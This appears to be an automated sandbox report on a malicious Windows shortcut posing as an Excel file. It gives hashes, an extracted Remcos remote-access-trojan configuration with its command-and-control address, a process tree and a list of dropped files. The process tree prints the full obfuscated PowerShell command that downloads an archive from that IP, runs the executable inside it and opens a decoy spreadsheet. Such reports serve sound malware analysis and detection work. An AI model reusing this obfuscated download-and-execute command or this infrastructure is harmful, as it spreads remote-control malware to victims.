Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-09-2024 11:25

General

  • Target

    rv_luti_2024_roku.xlsx.lnk

  • Size

    32KB

  • MD5

    bbcc000caf3fff5b3025da99cff2aa45

  • SHA1

    89a89db57a5b286b16d8d0a82903a4f256584bb5

  • SHA256

    3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24

  • SHA512

    1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1

  • SSDEEP

    48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ

Malware Config

Extracted

Family

remcos

Botnet

stalagg

C2

5.181.156.117:8576

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5TL39W

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe
        "C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4460
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:2320
            • C:\Windows\SysWOW64\explorer.exe
              C:\Windows\SysWOW64\explorer.exe
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2464
      • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:5008
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:4528

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\236a1896

        Filesize

        1.2MB

        MD5

        5cf75b5e5be210b4ff9135f860c319af

        SHA1

        f5f98457bec6d158fb41f38f850684184e7bcc7f

        SHA256

        2e7af787386f49f664293f2e684df6b95fa6531e6cc91368a02ede692e029ba5

        SHA512

        3706a14c0696a30a9cce579998f96be8b3c49b943fde117123684fda5d38885792b595a0b23b475b46b4503951e5f7bcc0864cc4a0be851d599f2cc0d1a1fee8

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckjhrvdv.osm.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Filesize

        274B

        MD5

        159d3322b89a7791a7abb7e992f5e017

        SHA1

        c985a3d73b315550622707e39fa2f7c16d63ebda

        SHA256

        bbbb4b06db6a97e44b9b34c4abcbf2a607b5b610b6052c0cbbf3acbb0c0773da

        SHA512

        9e73541bffcd2b98bec1a3f3a30f383223e7a174435779b22b7f221c450a2b69369d12c61af589d737c4001594bdeb4f27c56976b4f44184e45db30ae62d4d95

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        670B

        MD5

        b51a6bf4b6030da80cf3b2b923f7ba41

        SHA1

        69b84cdb94309b60cea15ea1b0ed82b32c87634b

        SHA256

        d05f0a92b7efadba5866a0f09d2626d6f42bb7f7db15f8c19355f3775badece4

        SHA512

        eac77806f4032d8336d2d7aa226a352ea286652232393ec12b4a0f1999c7211b422206ebf85f99e0947dc1df49511aecafaaad2e7edaffa9c58bdd2fd3986ac8

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

        Filesize

        1KB

        MD5

        3903fef58873da742093b1d881e233e7

        SHA1

        eef62a3144cae70e4720098ebfb337b6fc2d3f46

        SHA256

        88ef8a63000782ff3ae1883e0494496c841bb98da8a901159b7581e84540e5fd

        SHA512

        698e39f1eca6b9ad862b8081b995f8e51fb6caa4130209bba0fea7c29f307f56d8bed6240092b355ae6326faf56856571b683bfe5a87a7b04d520f4641bfc338

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\d3dx9_43.dll

        Filesize

        1.9MB

        MD5

        46e435aecb557fcb16ae2ea3b22ab7fd

        SHA1

        5290156599fd9575c4401c80949ad5672fe64da5

        SHA256

        70e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da

        SHA512

        621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\rnyt

        Filesize

        1.0MB

        MD5

        289d2d639e058b63ebe16bd8d543115d

        SHA1

        969736e5f6a2c416f556e2f73358020573486afc

        SHA256

        f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568

        SHA512

        7adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe

        Filesize

        2.2MB

        MD5

        d9530ecee42acccfd3871672a511bc9e

        SHA1

        89b4d2406f1294bd699ef231a4def5f495f12778

        SHA256

        81e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280

        SHA512

        d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980

      • C:\Users\Admin\AppData\Roaming\SecurityCheck\tkjm

        Filesize

        80KB

        MD5

        cae9827c507632c4a1980479c21a42a2

        SHA1

        d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e

        SHA256

        efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf

        SHA512

        441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768

      • C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx

        Filesize

        32KB

        MD5

        21046015d5d9ef5e536ac7643b1ab365

        SHA1

        f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05

        SHA256

        7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd

        SHA512

        d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e

      • memory/2320-98-0x00007FFFFD270000-0x00007FFFFD465000-memory.dmp

        Filesize

        2.0MB

      • memory/2320-109-0x0000000075380000-0x00000000754FB000-memory.dmp

        Filesize

        1.5MB

      • memory/2368-46-0x00007FFFFD270000-0x00007FFFFD465000-memory.dmp

        Filesize

        2.0MB

      • memory/2368-41-0x0000000074670000-0x00000000747EB000-memory.dmp

        Filesize

        1.5MB

      • memory/2464-112-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-111-0x00007FFFFD270000-0x00007FFFFD465000-memory.dmp

        Filesize

        2.0MB

      • memory/2464-143-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-142-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-141-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-132-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-123-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-122-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-121-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-116-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2464-115-0x0000000001050000-0x00000000010D4000-memory.dmp

        Filesize

        528KB

      • memory/2796-3-0x000001B7B3970000-0x000001B7B3992000-memory.dmp

        Filesize

        136KB

      • memory/2796-2-0x00007FFFDEE53000-0x00007FFFDEE55000-memory.dmp

        Filesize

        8KB

      • memory/2796-18-0x000001B79B7E0000-0x000001B79B7EA000-memory.dmp

        Filesize

        40KB

      • memory/2796-16-0x00007FFFDEE50000-0x00007FFFDF911000-memory.dmp

        Filesize

        10.8MB

      • memory/2796-14-0x00007FFFDEE50000-0x00007FFFDF911000-memory.dmp

        Filesize

        10.8MB

      • memory/2796-13-0x00007FFFDEE50000-0x00007FFFDF911000-memory.dmp

        Filesize

        10.8MB

      • memory/2796-45-0x00007FFFDEE50000-0x00007FFFDF911000-memory.dmp

        Filesize

        10.8MB

      • memory/2796-17-0x000001B7B5EB0000-0x000001B7B5EC2000-memory.dmp

        Filesize

        72KB

      • memory/3232-48-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-137-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-47-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-49-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-65-0x00007FFFBA9E0000-0x00007FFFBA9F0000-memory.dmp

        Filesize

        64KB

      • memory/3232-55-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-62-0x00007FFFBA9E0000-0x00007FFFBA9F0000-memory.dmp

        Filesize

        64KB

      • memory/3232-50-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-140-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-138-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/3232-139-0x00007FFFBD2F0000-0x00007FFFBD300000-memory.dmp

        Filesize

        64KB

      • memory/4460-64-0x0000000075380000-0x00000000754FB000-memory.dmp

        Filesize

        1.5MB

      • memory/4460-66-0x00007FFFFD270000-0x00007FFFFD465000-memory.dmp

        Filesize

        2.0MB

      • memory/4460-89-0x0000000075380000-0x00000000754FB000-memory.dmp

        Filesize

        1.5MB